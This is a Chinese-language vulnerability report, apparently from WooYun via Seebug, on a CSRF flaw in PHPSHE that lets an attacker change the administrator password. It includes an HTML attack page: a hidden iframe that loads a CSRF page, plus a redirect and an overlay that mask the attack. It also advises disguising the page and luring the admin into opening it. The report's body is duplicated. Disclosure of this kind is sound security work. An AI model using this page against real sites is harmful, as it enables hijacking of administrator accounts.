### 简要描述: PHPSHE csrf修改管理员密码 ### 详细说明: 1、一看修改管理员密码不要原密码验证抓包查看 [<img src="https://images.seebug.org/upload/201504/15180840a3cf869621387ac1729ececc6aa4b0be.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15180840a3cf869621387ac1729ececc6aa4b0be.jpg) [<img src="https://images.seebug.org/upload/201504/15180925bcd404f3137d8e9e3a2f0be4a53b5eaa.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15180925bcd404f3137d8e9e3a2f0be4a53b5eaa.png) 没有toekn值验证 2、构造表单进行修改 [<img src="https://images.seebug.org/upload/201504/151809479238fac8d91d1e14ebbc8ab452a93ace.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151809479238fac8d91d1e14ebbc8ab452a93ace.png) 成修改 [<img src="https://images.seebug.org/upload/201504/1518095622a16e7ea1e4442e45d53a46bbcf61fc.jpg" alt="4.jpg" width="600"...
### 简要描述: PHPSHE csrf修改管理员密码 ### 详细说明: 1、一看修改管理员密码不要原密码验证抓包查看 [<img src="https://images.seebug.org/upload/201504/15180840a3cf869621387ac1729ececc6aa4b0be.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15180840a3cf869621387ac1729ececc6aa4b0be.jpg) [<img src="https://images.seebug.org/upload/201504/15180925bcd404f3137d8e9e3a2f0be4a53b5eaa.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15180925bcd404f3137d8e9e3a2f0be4a53b5eaa.png) 没有toekn值验证 2、构造表单进行修改 [<img src="https://images.seebug.org/upload/201504/151809479238fac8d91d1e14ebbc8ab452a93ace.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151809479238fac8d91d1e14ebbc8ab452a93ace.png) 成修改 [<img src="https://images.seebug.org/upload/201504/1518095622a16e7ea1e4442e45d53a46bbcf61fc.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1518095622a16e7ea1e4442e45d53a46bbcf61fc.jpg) 不过这样发给管理一看就知道被修改了 3、 我们新建一个html,代码如下 ``` <html> <table style="left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;"><h1>乌云测试</h1></td></tr></tbody></table>< <meta http-equiv="refresh" content="4;url=http://www.baidu.com/"> <!--设置一个正常的跳转页面!--> <title>test</title> <iframe src="http://localhost/csrf.php"></iframe><!--csrf攻击页面的地址!--> </html> ``` 4、这样我们只要访问这个test页面之后就可以修改其密码,而且这个页面会自动跳转到你想跳转的地方(当然,这个页面你可以适度美化,掩饰) [<img src="https://images.seebug.org/upload/201504/15181346b34584fb45d3bd8f932b7916cbc4940a.png" alt=")NE$KO$03)(_CRGZ549H_98.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15181346b34584fb45d3bd8f932b7916cbc4940a.png) [<img src="https://images.seebug.org/upload/201504/15181355c9b553019ef78509365eb6a50d23911f.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15181355c9b553019ef78509365eb6a50d23911f.png) 也没提示啥的 诱惑管理员打开就ok 5.不知道不觉管理员密码就被修改了 [<img src="https://images.seebug.org/upload/201504/151815113006506447bc9bbc07b214c3f7c3689a.jpg" alt="J}}4@W~M%YVQVF2YFB@Y0EE.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151815113006506447bc9bbc07b214c3f7c3689a.jpg) ok ### 漏洞证明: 1、一看修改管理员密码不要原密码验证抓包查看 [<img src="https://images.seebug.org/upload/201504/15180840a3cf869621387ac1729ececc6aa4b0be.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15180840a3cf869621387ac1729ececc6aa4b0be.jpg) [<img src="https://images.seebug.org/upload/201504/15180925bcd404f3137d8e9e3a2f0be4a53b5eaa.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15180925bcd404f3137d8e9e3a2f0be4a53b5eaa.png) 没有toekn值验证 2、构造表单进行修改 [<img src="https://images.seebug.org/upload/201504/151809479238fac8d91d1e14ebbc8ab452a93ace.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151809479238fac8d91d1e14ebbc8ab452a93ace.png) 成修改 [<img src="https://images.seebug.org/upload/201504/1518095622a16e7ea1e4442e45d53a46bbcf61fc.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1518095622a16e7ea1e4442e45d53a46bbcf61fc.jpg) 不过这样发给管理一看就知道被修改了 3、 我们新建一个html,代码如下 ``` <html> <table style="left: 0px; top: 0px; position: fixed;z-index: 5000;position:absolute;width:100%;height:300%;background-color: black;"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;"><h1>乌云测试</h1></td></tr></tbody></table>< <meta http-equiv="refresh" content="4;url=http://www.baidu.com/"> <!--设置一个正常的跳转页面!--> <title>test</title> <iframe src="http://localhost/csrf.php"></iframe><!--csrf攻击页面的地址!--> </html> ``` 4、这样我们只要访问这个test页面之后就可以修改其密码,而且这个页面会自动跳转到你想跳转的地方(当然,这个页面你可以适度美化,掩饰) [<img src="https://images.seebug.org/upload/201504/15181346b34584fb45d3bd8f932b7916cbc4940a.png" alt=")NE$KO$03)(_CRGZ549H_98.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15181346b34584fb45d3bd8f932b7916cbc4940a.png) [<img src="https://images.seebug.org/upload/201504/15181355c9b553019ef78509365eb6a50d23911f.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15181355c9b553019ef78509365eb6a50d23911f.png) 也没提示啥的 诱惑管理员打开就ok 5.不知道不觉管理员密码就被修改了 [<img src="https://images.seebug.org/upload/201504/151815113006506447bc9bbc07b214c3f7c3689a.jpg" alt="J}}4@W~M%YVQVF2YFB@Y0EE.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151815113006506447bc9bbc07b214c3f7c3689a.jpg) ok